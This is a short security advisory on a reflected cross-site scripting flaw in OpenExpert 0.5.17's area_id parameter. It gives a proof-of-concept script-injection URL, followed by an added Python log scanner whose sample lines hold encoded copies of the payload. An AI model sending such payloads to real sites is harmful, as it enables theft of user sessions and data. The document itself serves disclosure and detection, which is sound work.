OpenExpert 0.5.17 Cross Site Scripting

2017-01-18T00:00:00
ID PACKETSTORM:140559
Type packetstorm
Reporter Nassim Asrir
Modified 2017-01-18T00:00:00

Description

`# Title : Openexpert 0.5.17 - Cross Site Scripting  
  
# Author: Nassim Asrir  
  
# Author Company: Henceforth  
  
# Tested on: Windows XP SP3 - Windows 7  
  
# Vendor: https://sourceforge.net/projects/law-expert/  
  
# Download Software: https://sourceforge.net/projects/law-expert/files/  
  
#################################################  
  
## About The Product : ##  
  
OpenExpert. Dual use Web based and Easy to Use Expert System or Education System.  
  
## Vulnerability : ##   
  
- Vulnerable Parameter : area_id  
  
- HTTP Method : GET  
  
- To exploit it : http://HOST/expert_wizard.php?area_id="><script>alert(1);</script>  
  
`
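
A log check for the request pattern this advisory describes, added here as an example and not part of the original advisory or the OpenExpert code: it flags requests to `expert_wizard.php` whose `area_id` value, after repeated percent-decoding, contains characters that can break out of an HTML attribute. The combined log format and the sample lines are assumptions, constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

ENDPOINT = "expert_wizard.php"   # script named in the advisory
PARAM = "area_id"                # parameter named in the advisory
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r'[<>"\']')  # characters that can break out of an HTML attribute

# Constructed sample lines in combined log format (assumed); not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [18/Jan/2017:10:01:02 +0000] "GET /expert_wizard.php?area_id=3 HTTP/1.1" 200 5120
198.51.100.9 - - [18/Jan/2017:10:02:11 +0000] "GET /expert_wizard.php?area_id=%22%3E%3Cscript%3Ealert(1);%3C/script%3E HTTP/1.1" 200 5340
198.51.100.9 - - [18/Jan/2017:10:02:15 +0000] "GET /expert_wizard.php?x=1&area_id=%2522%253E%253Cscript%253E HTTP/1.1" 200 5290
203.0.113.4 - - [18/Jan/2017:10:03:40 +0000] "GET /index.php?area_id=%3Cb%3E HTTP/1.1" 200 900
"""


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup is not missed."""
    for _ in range(max_rounds):
        decoded = unquote(value.replace("+", " "))
        if decoded == value:
            break
        value = decoded
    return value


def find_suspicious(log_text):
    """Return (line_no, client_ip, decoded_value) for area_id values carrying markup."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST.match(line)
        if not match:
            continue  # not a request line in the assumed format
        url = urlsplit(match["target"])
        if not url.path.lower().endswith(ENDPOINT):
            continue  # only the endpoint named in the advisory
        for pair in url.query.split("&"):
            name, _, raw = pair.partition("=")
            value = decode_fully(raw)
            if unquote(name) == PARAM and MARKUP.search(value):
                hits.append((line_no, match["ip"], value))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

Log matching only shows who sent such requests; the fix belongs in the application, which should validate `area_id` and HTML-encode it wherever it is written into the page.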